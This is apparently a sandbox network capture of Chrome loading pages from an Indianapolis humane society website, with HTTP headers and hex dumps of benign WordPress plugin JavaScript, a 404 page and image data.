                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC441OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/general.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 71570
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/general.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC700INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 34 31 35 32 33 3a 74 3d 3e 7b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 63 6f 6e 73 74 20 69 3d 5b 5d 3b 6f 2e 61 64 64 52 65 73 69 7a 65 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 2d 31 3d 3d 3d 69 2e 69 6e 64 65 78 4f 66 28 74 29 26 26 28 74 2e 24 24 73 63 6f 70 65 3d 65 2c 69 2e 70 75 73 68 28 74 29 29 2c 6f 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 74 3d 6f 2e 24 77 69 6e 64 6f 77 2e 77 69 64 74 68 28 29 3b 6f 2e 24 77 69 6e 64 6f 77 2e 6f 66 66 28 22 72 65 73 69 7a 65 2e 74 61 72 22 29 2e 6f 6e 28 22 72 65 73 69 7a 65 2e 74 61 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 24 77 69 6e 64 6f 77 2e 77 69 64 74 68 28 29 21 3d
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var t={41523:t=>{!function(e,o){const i=[];o.addResizeCallback=function(t,e){return-1===i.indexOf(t)&&(t.$$scope=e,i.push(t)),o},t.exports=function(){let t=o.$window.width();o.$window.off("resize.tar").on("resize.tar",(function(){o.$window.width()!=
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 2e 24 24 73 63 6f 70 65 7c 7c 74 68 69 73 2c 73 2c 72 2c 61 29 7d 29 29 7d 29 29 2c 6f 2e 24 77 69 6e 64 6f 77 2e 74 72 69 67 67 65 72 28 22 73 63 72 6f 6c 6c 22 29 7d 7d 28 54 68 72 69 76 65 47 6c 6f 62 61 6c 2e 24 6a 2c 54 43 42 5f 46 72 6f 6e 74 29 7d 2c 31 31 34 38 31 3a 28 29 3d 3e 7b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 74 68 69 73 2e 65 6c 3d 74 28 65 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 74 2e 65 78 74 65 6e 64 28 7b 7d 2c 74 2e 66 6e 2e 74 79 70 65 64 2e 64 65 66 61 75 6c 74 73 2c 6f 29 2c 74 68 69 73 2e 69 73 49 6e 70 75 74 3d 74 68 69 73 2e 65 6c 2e 69 73 28 22 69 6e 70 75 74 22 29 2c 74 68 69 73 2e 61 74 74 72 3d 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                        Data Ascii: .$$scope||this,s,r,a)}))})),o.$window.trigger("scroll")}}(ThriveGlobal.$j,TCB_Front)},11481:()=>{!function(t){"use strict";const e=function(e,o){this.el=t(e),this.options=t.extend({},t.fn.typed.defaults,o),this.isInput=this.el.is("input"),this.attr=this.o
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 65 6c 65 74 65 22 3d 3d 3d 74 3f 65 2e 74 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 6f 2c 65 2e 73 74 61 72 74 44 65 6c 61 79 29 3a 6f 28 29 7d 2c 62 75 69 6c 64 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 3b 69 66 28 21 30 3d 3d 3d 74 68 69 73 2e 73 68 6f 77 43 75 72 73 6f 72 26 26 28 74 68 69 73 2e 63 75 72 73 6f 72 3d 74 28 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 79 70 65 64 2d 63 75 72 73 6f 72 22 3e 27 2b 74 68 69 73 2e 63 75 72 73 6f 72 43 68 61 72 2b 22 3c 2f 73 70 61 6e 3e 22 29 2c 74 68 69 73 2e 65 6c 2e 61 66 74 65 72 28 74 68 69 73 2e 63 75 72 73 6f 72 29 29 2c 74 68 69 73 2e 73 74 72 69 6e 67 73 45 6c 65 6d 65 6e 74 29 7b 65 2e 73 74 72 69 6e 67 73 3d 5b 5d 2c 74 68 69 73 2e 73 74 72 69 6e 67 73 45 6c 65 6d 65 6e 74 2e 68 69
                                                                                                                                                                                                                                                        Data Ascii: elete"===t?e.timeout=setTimeout(o,e.startDelay):o()},build(){const e=this;if(!0===this.showCursor&&(this.cursor=t('<span class="typed-cursor">'+this.cursorChar+"</span>"),this.el.after(this.cursor)),this.stringsElement){e.strings=[],this.stringsElement.hi
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 68 74 6d 6c 22 3d 3d 3d 69 2e 63 6f 6e 74 65 6e 74 54 79 70 65 26 26 22 3e 22 3d 3d 3d 74 2e 73 75 62 73 74 72 28 65 29 2e 63 68 61 72 41 74 28 30 29 29 7b 66 6f 72 28 3b 22 3c 22 21 3d 3d 74 2e 73 75 62 73 74 72 28 65 29 2e 63 68 61 72 41 74 28 30 29 3b 29 65 2d 2d 3b 65 2d 2d 7d 63 6f 6e 73 74 20 6f 3d 74 2e 73 75 62 73 74 72 28 30 2c 65 29 2c 6e 3d 74 2e 73 75 62 73 74 72 28 65 29 3b 69 2e 61 74 74 72 3f 69 2e 65 6c 2e 61 74 74 72 28 69 2e 61 74 74 72 2c 6f 29 3a 69 2e 65 6c 2e 68 74 6d 6c 28 6f 2b 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 27 2b 69 2e 6f 70 74 69 6f 6e 73 2e 68 69 67 68 6c 69 67 68 74 43 6c 61 73 73 2b 27 22 20 73 74 79 6c 65 3d 22 27 2b 28 69 2e 6f 70 74 69 6f 6e 73 2e 68 69 67 68 6c 69 67
                                                                                                                                                                                                                                                        Data Ascii: function(){if("html"===i.contentType&&">"===t.substr(e).charAt(0)){for(;"<"!==t.substr(e).charAt(0);)e--;e--}const o=t.substr(0,e),n=t.substr(e);i.attr?i.el.attr(i.attr,o):i.el.html(o+'<span class="'+i.options.highlightClass+'" style="'+(i.options.highlig
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 69 6e 69 74 28 29 29 7d 2c 72 65 73 65 74 28 29 7b 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 74 69 6d 65 6f 75 74 29 3b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 65 6c 2e 61 74 74 72 28 22 69 64 22 29 3b 74 68 69 73 2e 65 6c 2e 61 66 74 65 72 28 27 3c 73 70 61 6e 20 69 64 3d 22 27 2b 74 2b 27 22 2f 3e 27 29 2c 74 68 69 73 2e 65 6c 2e 72 65 6d 6f 76 65 28 29 2c 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 63 75 72 73 6f 72 26 26 74 68 69 73 2e 63 75 72 73 6f 72 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 73 65 74 43 61 6c 6c 62 61 63 6b 28 29 7d 7d 2c 74 2e 66 6e 2e 74 79 70 65 64 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73
                                                                                                                                                                                                                                                        Data Ascii: init())},reset(){clearInterval(this.timeout);const t=this.el.attr("id");this.el.after('<span id="'+t+'"/>'),this.el.remove(),void 0!==this.cursor&&this.cursor.remove(),this.options.resetCallback()}},t.fn.typed=function(o){return this.each((function(){cons
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 66 28 74 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 2c 61 3d 74 68 69 73 2e 5f 6b 65 79 53 74 72 2e 69 6e 64 65 78 4f 66 28 74 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 2c 65 3d 6e 3c 3c 32 7c 73 3e 3e 34 2c 6f 3d 28 31 35 26 73 29 3c 3c 34 7c 72 3e 3e 32 2c 69 3d 28 33 26 72 29 3c 3c 36 7c 61 2c 6c 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 29 2c 36 34 21 3d 72 26 26 28 6c 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6f 29 29 2c 36 34 21 3d 61 26 26 28 6c 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 69 29 29 3b 72 65 74 75 72 6e 20 6c 3d 74 68 69 73 2e 5f 75 74 66 38 5f 64 65 63 6f 64 65 28 6c 29 2c 6c 7d 2c 5f 75 74 66 38 5f 65 6e 63 6f 64 65 28 74 29 7b 74 3d 74 2e 72 65 70 6c 61 63 65 28 2f
                                                                                                                                                                                                                                                        Data Ascii: f(t.charAt(c++)),a=this._keyStr.indexOf(t.charAt(c++)),e=n<<2|s>>4,o=(15&s)<<4|r>>2,i=(3&r)<<6|a,l+=String.fromCharCode(e),64!=r&&(l+=String.fromCharCode(o)),64!=a&&(l+=String.fromCharCode(i));return l=this._utf8_decode(l),l},_utf8_encode(t){t=t.replace(/
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 5f 62 6c 61 6e 6b 22 3d 3d 3d 74 68 69 73 2e 64 61 74 61 73 65 74 2e 74 61 72 67 65 74 29 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 64 61 74 61 73 65 74 2e 68 72 65 66 2c 22 5f 62 6c 61 6e 6b 22 2c 22 6e 6f 6f 70 65 6e 65 72 22 29 3b 65 6c 73 65 7b 6c 65 74 20 74 3b 69 66 28 74 68 69 73 2e 64 61 74 61 73 65 74 2e 68 61 73 68 29 74 72 79 7b 74 3d 65 28 74 68 69 73 2e 64 61 74 61 73 65 74 2e 68 61 73 68 29 7d 63 61 74 63 68 28 74 29 7b 7d 74 26 26 74 2e 6c 65 6e 67 74 68 3f 54 43 42 5f 46 72 6f 6e 74 2e 6a 75 6d 70 53 63 72 6f 6c 6c 54 6f 28 74 2c 74 68 69 73 29 3a 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 68 69 73 2e 64 61 74 61 73 65 74 2e 68 72 65 66 7d 72 65 74 75 72 6e 21 31 7d 74 2e 65 78 70 6f
                                                                                                                                                                                                                                                        Data Ascii: ))return!0;if("_blank"===this.dataset.target)window.open(this.dataset.href,"_blank","noopener");else{let t;if(this.dataset.hash)try{t=e(this.dataset.hash)}catch(t){}t&&t.length?TCB_Front.jumpScrollTo(t,this):location.href=this.dataset.href}return!1}t.expo
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 7d 28 29 2c 69 28 74 29 2c 6f 2e 61 64 64 52 65 73 69 7a 65 43 61 6c 6c 62 61 63 6b 28 69 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 66 69 6e 64 28 22 61 20 3e 20 2e 74 63 62 2d 63 6f 6c 2c 20 61 20 3e 20 2e 74 68 72 76 2d 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 6f 3d 7b 22 64 61 74 61 2d 68 72 65 66 22 3a 74 2e 68 72 65 66 2c 22 64 61 74 61 2d 68 61 73 68 22 3a 74 2e 68 61 73 68 2c 22 6a 75 6d 70 2d 61 6e 69 6d 61 74 69 6f 6e 22 3a 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6a 75 6d 70 2d 61 6e 69 6d 61 74 69 6f 6e 22 29 2c 22 64 61 74 61 2d 74 61 72 67 65 74 22 3a 74 2e 67
                                                                                                                                                                                                                                                        Data Ascii: .appendChild(t)}}(),i(t),o.addResizeCallback(i),function(t){t.find("a > .tcb-col, a > .thrv-content-box").each((function(){const t=this.parentNode,o={"data-href":t.href,"data-hash":t.hash,"jump-animation":t.getAttribute("jump-animation"),"data-target":t.g
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 30 2c 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 22 3a 30 2c 22 7a 2d 69 6e 64 65 78 22 3a 33 7d 29 2c 6e 2e 63 73 73 28 7b 22 6d 69 6e 2d 68 65 69 67 68 74 22 3a 22 63 61 6c 63 28 20 31 30 30 76 68 20 2d 20 22 2b 65 2b 22 70 78 20 29 20 22 2c 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 22 3a 65 2c 22 62 6f 78 2d 73 69 7a 69 6e 67 22 3a 22 75 6e 73 65 74 22 7d 29 2c 74 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 2d 78 22 2c 22 76 69 73 69 62 6c 65 22 29 29 29 7d 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3f 6e 65 77 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 28 28 29 3d 3e 7b 73 28 29 7d 29 29 2e 6f 62 73 65 72 76 65 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 3a 73
                                                                                                                                                                                                                                                        Data Ascii: 0,"padding-bottom":0,"z-index":3}),n.css({"min-height":"calc( 100vh - "+e+"px ) ","padding-bottom":e,"box-sizing":"unset"}),t.css("overflow-x","visible")))};"undefined"!=typeof ResizeObserver?new ResizeObserver((()=>{s()})).observe(window.document.body):s
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 74 61 2d 73 77 69 74 63 68 2d 6f 6e 2d 73 63 72 6f 6c 6c 22 2c 54 43 42 5f 46 72 6f 6e 74 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 29 29 3b 69 66 28 72 26 26 21 69 73 4e 61 4e 28 72 29 29 7b 61 2e 61 64 64 43 6c 61 73 73 28 6e 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 29 3b 63 6f 6e 73 74 20 74 3d 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 6f 70 61 63 69 74 79 3a 30 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 22 62 6f 78 2d 73 69 7a 69 6e 67 22 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 2c 6c 65 66 74 3a 30 2c 74 6f 70 3a 73 7d 3b 61 2e 63 73 73 28 74 29 2e 61 64 64 43 6c 61 73 73 28 22 74 68 72 69 76 65 2d 73 79 6d 62 6f 6c 2d 73 68 6f 72 74 63 6f 64 65 2d 73 63 72 6f 6c 6c 22 29 2e 69 6e 73 65 72 74 41 66 74 65 72 28 6c 29 2c 61
                                                                                                                                                                                                                                                        Data Ascii: ta-switch-on-scroll",TCB_Front.getDisplayType());if(r&&!isNaN(r)){a.addClass(n).removeClass(i);const t={position:"absolute",opacity:0,width:"100%","box-sizing":"border-box",left:0,top:s};a.css(t).addClass("thrive-symbol-shortcode-scroll").insertAfter(l),a


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        40192.168.2.449791199.16.172.264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC612OUTGET /adoptablesearch/images/PetPlaceLogo.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: indyhumane.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC491INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Host-Header: wpcloud
                                                                                                                                                                                                                                                        Vary: Cookie
                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                        Link: <https://indyhumane.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca BYPASS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC878INData Raw: 38 31 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c
                                                                                                                                                                                                                                                        Data Ascii: 81a<!doctype html><html lang="en-US" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyl


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        41192.168.2.449796192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC626OUTGET /wp-content/uploads/2021/05/hero-dog.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC593INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 134432
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2021/05/hero-dog.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 30 Nov 2022 17:59:37 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC776INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6b 00 00 02 bc 08 03 00 00 00 87 a9 08 41 00 00 02 1f 50 4c 54 45 00 00 00 04 04 04 02 02 02 03 03 03 01 01 01 03 03 03 01 01 01 01 01 01 02 02 02 03 03 03 04 04 04 ff ff ff f4 f4 f4 f2 f2 f2 fe fe fe fe fe fe fc fc fc fc fc fc fb fb fb f3 f3 f3 fd fd fd fa fa fa ee ee ee 34 34 34 e3 e3 e3 bf bf bf cc cc cc 5a 5a 5a d8 d8 d8 43 43 43 87 87 87 af af af 75 75 75 75 75 75 9e 9e 9e 96 95 95 a6 a4 a4 b4 b4 b4 55 55 55 99 99 99 de de de ff ff ff 31 28 28 3a 30 2f 46 3a 3a 3e 35 36 34 30 30 2c 23 23 28 1e 1d 40 3c 3c 42 33 32 1f 17 17 4a 40 40 4b 47 47 38 2c 2b 1b 11 12 fb fa f9 5c 4a 48 71 69 6a 54 43 42 5d 58 59 63 53 52 4f 3f 3f 46 43 44 55 51 53 52 4c 4d 15 0c 0c 52 48 48 0c 06 07 65 5e 5e f1 ee eb 6a
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRkAPLTE444ZZZCCCuuuuuuUUU1((:0/F::>56400,##(@<<B32J@@KGG8,+\JHqijTCB]XYcSRO??FCDUQSRLMRHHe^^j
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 0c 37 18 cd 1b e2 e1 48 2d 6e 30 dc 60 84 d4 99 c0 91 d4 02 ab 14 62 a5 99 21 8e 17 94 45 6d 10 57 9a 22 1e 27 48 d4 06 83 89 4c 05 be 00 6a 83 c1 a5 11 5f 26 48 ed 50 1b 9c dd 9e 92 f8 72 81 b4 47 6d 70 7a a6 f1 54 c8 2c 1c 7e cd c3 ef 84 55 81 a7 24 75 e6 12 80 9f 52 2b 79 72 81 14 4e 82 c0 d1 4c e3 2b 21 63 3d b6 29 8c d9 9e a1 c7 a1 c8 f3 fe 35 10 a9 be 37 e4 06 49 92 d1 e0 ce 98 f3 7a 5b f7 da 7a 13 38 0a 69 ac d3 99 8b da 9e c5 a6 6e 9a 43 57 55 87 76 53 84 1e 47 21 a5 33 1c 1c 9f 2b 61 15 f1 50 45 fd d6 ed 97 e5 7a f9 f0 b4 7a 7d 69 db ed 26 e7 58 24 fb de f0 f9 36 3f 69 26 79 b0 62 db bd ef f7 0f eb fb db 72 f9 58 ae 56 87 a6 69 9f eb ed e7 7c e3 58 4a 7b dc c3 9a 93 a8 ff 9e 79 fd 56 95 bb 72 b7 2b 57 9f 8f a7 c7 f5 f2 be aa aa a6 eb da bb 10 38
                                                                                                                                                                                                                                                        Data Ascii: 7H-n0`b!EmW"'HLj_&HPrGmpzT,~U$uR+yrNL+!c=)57Iz[z8inCWUvSG!3+aPEzz}i&X$6?i&ybrXVi|XJ{yVr+W8
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: b9 1b c9 1e bc cc 7b fa ff bb b1 b2 b4 49 77 23 7f 5c 81 e0 2d db c0 b1 cc de 62 f1 d2 01 6a 57 66 af d7 6d b6 ea fa b6 22 47 b7 f7 ee ef 11 68 78 50 8a 16 33 62 86 a6 82 25 4e d2 b2 20 8f b9 c3 59 05 5c e4 a2 46 c6 c8 64 33 78 e0 55 56 23 e6 b2 8c 1a ac 94 4b 85 c9 64 3a 75 a9 1d e2 29 81 5b 55 23 f5 87 22 7f 43 22 70 5b ec 54 a2 f7 88 f7 5a 0a 09 b8 a7 63 59 26 cc b3 db ed d6 d0 e3 50 a2 32 a4 28 51 85 22 9b 01 d0 28 61 03 6e 9c f7 23 96 19 1c e3 0c 76 50 e0 c7 45 02 09 98 71 d2 86 f8 96 d5 e2 d9 38 9e 69 34 44 e5 4a 41 e6 3e 5c 12 9d df 99 b3 10 37 b1 9a 6f e7 26 c1 40 ff 92 84 ef 9f f3 e6 df 00 67 77 bd af e5 c8 e7 6d db b1 6a 57 8d 5e 0b 61 6d 3c 99 28 28 36 15 99 c5 5d 0e 02 05 c5 00 04 d8 34 75 9e 8b b1 7d 66 e9 64 64 f8 ac d1 7d 3c 51 61 9f 19 fa
                                                                                                                                                                                                                                                        Data Ascii: {Iw#\-bjWfm"GhxP3b%N Y\Fd3xUV#Kd:u)[U#"C"p[TZcY&P2(Q"(an#vPEq8i4DJA>\7o&@gwmjW^am<((6]4u}fdd}<Qa
